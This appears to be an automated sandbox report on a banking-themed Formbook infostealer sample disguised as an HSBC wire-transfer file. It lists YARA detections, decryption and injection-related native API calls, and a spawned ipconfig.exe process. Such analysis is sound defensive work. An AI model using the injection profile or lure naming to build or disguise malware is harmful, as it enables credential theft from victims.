Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 0_2_00C68250		0_2_00C68250
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 0_2_00C6D2F8		0_2_00C6D2F8
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00401030		6_2_00401030
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041E30C		6_2_0041E30C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041DB36		6_2_0041DB36
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00402D90		6_2_00402D90
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00409E5F		6_2_00409E5F
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00409E60		6_2_00409E60
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041D6AE		6_2_0041D6AE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00402FB0		6_2_00402FB0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00C05C24		6_2_00C05C24
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01644120		6_2_01644120
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162F900		6_2_0162F900
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016FE824		6_2_016FE824
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A830		6_2_0164A830
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1002		6_2_016E1002
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F28EC		6_2_016F28EC
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F20A8		6_2_016F20A8
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163B090		6_2_0163B090
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164AB40		6_2_0164AB40
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F2B28		6_2_016F2B28
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016D23E3		6_2_016D23E3
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E03DA		6_2_016E03DA
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EDBD2		6_2_016EDBD2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165ABD8		6_2_0165ABD8
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165EBB0		6_2_0165EBB0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016DFA2B		6_2_016DFA2B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F22AE		6_2_016F22AE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F1D55		6_2_016F1D55
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01620D20		6_2_01620D20
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F2D07		6_2_016F2D07
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163D5E0		6_2_0163D5E0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F25DD		6_2_016F25DD
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652581		6_2_01652581
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016ED466		6_2_016ED466
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163841F		6_2_0163841F
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F1FF1		6_2_016F1FF1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016FDFCE		6_2_016FDFCE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01646E30		6_2_01646E30
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016ED616		6_2_016ED616
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F2EF7		6_2_016F2EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366AB40		16_2_0366AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03712B28		16_2_03712B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370DBD2		16_2_0370DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037003DA		16_2_037003DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367EBB0		16_2_0367EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036FFA2B		16_2_036FFA2B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037122AE		16_2_037122AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03664120		16_2_03664120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364F900		16_2_0364F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0371E824		16_2_0371E824
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A830		16_2_0366A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03701002		16_2_03701002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037128EC		16_2_037128EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036720A0		16_2_036720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037120A8		16_2_037120A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365B090		16_2_0365B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03711FF1		16_2_03711FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0371DFCE		16_2_0371DFCE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03666E30		16_2_03666E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370D616		16_2_0370D616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03712EF7		16_2_03712EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03711D55		16_2_03711D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03640D20		16_2_03640D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03712D07		16_2_03712D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365D5E0		16_2_0365D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037125DD		16_2_037125DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03672581		16_2_03672581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370D466		16_2_0370D466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365841F		16_2_0365841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7D6AE		16_2_02C7D6AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C69E5F		16_2_02C69E5F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C69E60		16_2_02C69E60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C62FB0		16_2_02C62FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C62D90		16_2_02C62D90

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: String function: 0162B150 appears 133 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0364B150 appears 72 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041A360 NtCreateFile,		6_2_0041A360
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041A410 NtReadFile,		6_2_0041A410
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041A490 NtClose,		6_2_0041A490
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041A540 NtAllocateVirtualMemory,		6_2_0041A540
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041A35A NtCreateFile,		6_2_0041A35A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041A3B2 NtCreateFile,		6_2_0041A3B2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,		6_2_01669910
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016699A0 NtCreateSection,LdrInitializeThunk,		6_2_016699A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,		6_2_01669860
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669840 NtDelayExecution,LdrInitializeThunk,		6_2_01669840
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,		6_2_016698F0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669A50 NtCreateFile,LdrInitializeThunk,		6_2_01669A50
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669A20 NtResumeThread,LdrInitializeThunk,		6_2_01669A20
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,		6_2_01669A00
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669540 NtReadFile,LdrInitializeThunk,		6_2_01669540
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016695D0 NtClose,LdrInitializeThunk,		6_2_016695D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669710 NtQueryInformationToken,LdrInitializeThunk,		6_2_01669710
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,		6_2_016697A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669780 NtMapViewOfSection,LdrInitializeThunk,		6_2_01669780
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,		6_2_01669660
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,		6_2_016696E0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669950 NtQueueApcThread,		6_2_01669950
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016699D0 NtCreateProcessEx,		6_2_016699D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0166B040 NtSuspendThread,		6_2_0166B040
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669820 NtEnumerateKey,		6_2_01669820
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016698A0 NtWriteVirtualMemory,		6_2_016698A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669B00 NtSetValueKey,		6_2_01669B00
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0166A3B0 NtGetContextThread,		6_2_0166A3B0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669A10 NtQuerySection,		6_2_01669A10
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669A80 NtOpenDirectoryObject,		6_2_01669A80
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669560 NtWriteFile,		6_2_01669560
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669520 NtWaitForSingleObject,		6_2_01669520
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0166AD30 NtSetContextThread,		6_2_0166AD30
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016695F0 NtQueryInformationFile,		6_2_016695F0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669760 NtOpenProcess,		6_2_01669760
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0166A770 NtOpenThread,		6_2_0166A770
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669770 NtSetInformationFile,		6_2_01669770
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669730 NtQueryVirtualMemory,		6_2_01669730
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0166A710 NtOpenProcessToken,		6_2_0166A710
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669FE0 NtCreateMutant,		6_2_01669FE0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669670 NtQueryInformationProcess,		6_2_01669670
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669650 NtQueryValueKey,		6_2_01669650
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01669610 NtEnumerateValueKey,		6_2_01669610
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016696D0 NtCreateKey,		6_2_016696D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689A50 NtCreateFile,LdrInitializeThunk,		16_2_03689A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689910 NtAdjustPrivilegesToken,LdrInitializeThunk,		16_2_03689910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036899A0 NtCreateSection,LdrInitializeThunk,		16_2_036899A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689860 NtQuerySystemInformation,LdrInitializeThunk,		16_2_03689860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689840 NtDelayExecution,LdrInitializeThunk,		16_2_03689840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689710 NtQueryInformationToken,LdrInitializeThunk,		16_2_03689710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689FE0 NtCreateMutant,LdrInitializeThunk,		16_2_03689FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689780 NtMapViewOfSection,LdrInitializeThunk,		16_2_03689780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036896E0 NtFreeVirtualMemory,LdrInitializeThunk,		16_2_036896E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036896D0 NtCreateKey,LdrInitializeThunk,		16_2_036896D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689540 NtReadFile,LdrInitializeThunk,		16_2_03689540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036895D0 NtClose,LdrInitializeThunk,		16_2_036895D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689B00 NtSetValueKey,		16_2_03689B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0368A3B0 NtGetContextThread,		16_2_0368A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689A20 NtResumeThread,		16_2_03689A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689A00 NtProtectVirtualMemory,		16_2_03689A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689A10 NtQuerySection,		16_2_03689A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689A80 NtOpenDirectoryObject,		16_2_03689A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689950 NtQueueApcThread,		16_2_03689950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036899D0 NtCreateProcessEx,		16_2_036899D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0368B040 NtSuspendThread,		16_2_0368B040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689820 NtEnumerateKey,		16_2_03689820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036898F0 NtReadVirtualMemory,		16_2_036898F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036898A0 NtWriteVirtualMemory,		16_2_036898A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689760 NtOpenProcess,		16_2_03689760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0368A770 NtOpenThread,		16_2_0368A770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689770 NtSetInformationFile,		16_2_03689770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689730 NtQueryVirtualMemory,		16_2_03689730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0368A710 NtOpenProcessToken,		16_2_0368A710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036897A0 NtUnmapViewOfSection,		16_2_036897A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689660 NtAllocateVirtualMemory,		16_2_03689660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689670 NtQueryInformationProcess,		16_2_03689670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689650 NtQueryValueKey,		16_2_03689650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689610 NtEnumerateValueKey,		16_2_03689610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689560 NtWriteFile,		16_2_03689560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03689520 NtWaitForSingleObject,		16_2_03689520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0368AD30 NtSetContextThread,		16_2_0368AD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036895F0 NtQueryInformationFile,		16_2_036895F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7A360 NtCreateFile,		16_2_02C7A360
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7A490 NtClose,		16_2_02C7A490
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7A410 NtReadFile,		16_2_02C7A410
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7A3B2 NtCreateFile,		16_2_02C7A3B2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7A35A NtCreateFile,		16_2_02C7A35A

Sample file is different than original file name gathered from version info

Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
Source: HSBC ... Wire Transfer Copy.exe	Binary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Sample is known by Antivirus

Source: HSBC ... Wire Transfer Copy.exe	Virustotal: Detection: 16%
Source: HSBC ... Wire Transfer Copy.exe	ReversingLabs: Detection: 40%

Sample reads its own file content

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

File read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.Identifier

Jump to behavior

PE file has an executable .text section and no other executable section

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
